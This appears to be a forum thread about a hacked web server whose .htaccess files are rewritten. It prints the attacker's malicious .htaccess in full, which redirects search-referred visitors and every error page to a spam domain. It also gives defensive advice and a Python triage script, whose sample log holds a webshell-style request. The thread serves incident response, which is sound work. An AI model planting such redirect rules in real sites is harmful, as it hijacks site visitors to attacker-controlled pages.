Possible Duplicate:
My server's been hacked EMERGENCY
There seems to be a malicious script accessing my server and editing the .htaccess files for all of my hosted sites to redirect towards spam links.
What is the best way to stop this from happening?
I have changed my server access details, both for the control panel and for FTP access, and tried updating the existing .htaccess files with the following code, but it still appears to be changing.
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
# block query strings carrying <script> tags or attempts to override GLOBALS / _REQUEST (XSS and register_globals abuse, not SQL injection)
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
Is there anything else that would help?
Sorry for any lack of information, I'm fairly new to servers etc so if there is any extra details needed, just shout out!
Thanks in advance for any help.
Dan
******* EDIT *******
The malicious .htaccess, as requested:
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>
# STRONG HTACCESS PROTECTION
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 http://byidelement.ru/ruby/index.php
ErrorDocument 401 http://byidelement.ru/ruby/index.php
ErrorDocument 403 http://byidelement.ru/ruby/index.php
ErrorDocument 404 http://byidelement.ru/ruby/index.php
ErrorDocument 500 http://byidelement.ru/ruby/index.php
Run chkrootkit on there quickly, just in case.
Make sure all the packages are up to date with security fixes:
apt-get update; apt-get dist-upgrade
yum upgrade
It's likely, though, that this is a known exploit in the version of WordPress (or some other off-the-shelf framework) you're running, and now that it has been discovered it's being remotely exploited again and again. If this is the case, look up the latest version of every framework you're running and check for security fixes.
Assuming it has been exploited remotely, this can be confirmed by getting a tail running on the web server access log(s) and watching for any suspicious activity. tail -f /var/log/apache2/access-log would be the command on a stock Ubuntu install, but all distros place their Apache logs in different places. When you see something suspicious you'll know which VirtualHost has been compromised. If you're feeling adventurous, scan through your historic access logs as well. This can be daunting on a high-traffic server but will show the point of attack. Narrow down your search by looking around the time when you know the first attack took place.
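The two steps above (find which .htaccess files were rewritten, then look at the access log around the time they changed) can be scripted. The following is an added example written for this page; it is not code from the question or the answer. It assumes the sites live under one web root, that Apache writes the "combined" log format, and that on a stock WordPress install direct requests to PHP files under /wp-content/ are rare enough to be worth flagging; the redirect host it matches is the one in the posted malicious file, and the log lines, IPs and paths are constructed for the demo.

```python
"""Triage for a wave of rewritten .htaccess files: find the files carrying the
injected redirect, then pull the access-log requests that could have written
them. Added example; not code from the question or the answer."""
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone

# Redirect host taken from the malicious .htaccess posted in the question.
KNOWN_BAD_HOSTS = {"byidelement.ru"}

# A normal site has no reason to send RewriteRule or ErrorDocument targets to
# another host; the posted file does exactly that, so flag any off-site target.
OFFSITE_TARGET_RE = re.compile(
    r"^\s*(RewriteRule|ErrorDocument)\s+\S+\s+(https?://[^\s/]+)", re.I)

# Apache "combined" log format (assumed); timestamp like 10/Oct/2012:13:55:36 +0000
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def parse_ts(ts):
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def suspicious_lines(text):
    """(line_no, reason) for each directive that points visitors off-site."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = OFFSITE_TARGET_RE.match(line)
        if m:
            host = m.group(2).split("//", 1)[1].lower()
            hits.append((n, "known bad host" if host in KNOWN_BAD_HOSTS else "off-site target"))
    return hits


def find_infected(webroot):
    """{path: mtime as UTC datetime} for every infected .htaccess under webroot."""
    found = {}
    for dirpath, _dirs, files in os.walk(webroot):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            if suspicious_lines(fh.read()):
                found[path] = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
    return found


def requests_near(log_lines, when, window_minutes=10):
    """Requests in the window before `when` (datetime or log timestamp string)
    that could have written a file: POST/PUT to a PHP script, or any hit on a
    PHP file under /wp-content/ (assumed heuristic: direct PHP requests there
    are rare on a stock site). Returns (ts, ip, method, path, status), oldest first."""
    if isinstance(when, str):
        when = parse_ts(when)
    window, out = timedelta(minutes=window_minutes), []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        path = m["path"].split("?", 1)[0]
        if not (when - window <= ts <= when) or not path.endswith(".php"):
            continue
        if m["method"] in ("POST", "PUT") or path.startswith("/wp-content/"):
            out.append((ts, m["ip"], m["method"], m["path"], m["status"]))
    return sorted(out)


# --- constructed sample data (not from the page) ---------------------------
MALICIOUS_SAMPLE = """<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>
ErrorDocument 404 http://byidelement.ru/ruby/index.php
"""
CLEAN_SAMPLE = """# BEGIN WordPress
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
ErrorDocument 404 /404.html
"""
INFECTED_MTIME = "10/Oct/2012:13:55:36 +0000"   # when the sample file was rewritten
SAMPLE_LOG = [  # fictitious IPs and paths
    '203.0.113.7 - - [10/Oct/2012:13:40:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [10/Oct/2012:12:30:00 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2012:13:52:18 +0000] "POST /wp-content/uploads/2012/10/img.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2012:13:53:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2012:13:54:40 +0000] "GET /wp-content/uploads/2012/10/img.php?cmd=ls HTTP/1.1" 200 310 "-" "curl/7.26.0"',
]


def build_sample_site(root=None):
    """Write site1/.htaccess (infected, backdated to INFECTED_MTIME) and
    site2/.htaccess (clean) under a temp dir; return the root."""
    root = root or tempfile.mkdtemp(prefix="htaccess-triage-")
    for site, text in (("site1", MALICIOUS_SAMPLE), ("site2", CLEAN_SAMPLE)):
        os.makedirs(os.path.join(root, site), exist_ok=True)
        with open(os.path.join(root, site, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write(text)
    t = parse_ts(INFECTED_MTIME).timestamp()
    os.utime(os.path.join(root, "site1", ".htaccess"), (t, t))
    return root


if __name__ == "__main__":
    for path, mtime in find_infected(build_sample_site()).items():
        print(f"{path} rewritten at {mtime:%Y-%m-%d %H:%M:%S %Z}")
        for ts, ip, method, req, status in requests_near(SAMPLE_LOG, mtime):
            print(f"  {ts:%H:%M:%S} {ip} {method} {req} {status}")
```

On a real box, point find_infected at the web root and feed requests_near the lines of the matching VirtualHost's access log; the off-site-target rule catches the injected redirect even after the attacker changes the domain, and the mtime gives the window in which to look for the upload or webshell request. Note that mtime only survives until the file is next rewritten, so copy the infected files aside before cleaning them.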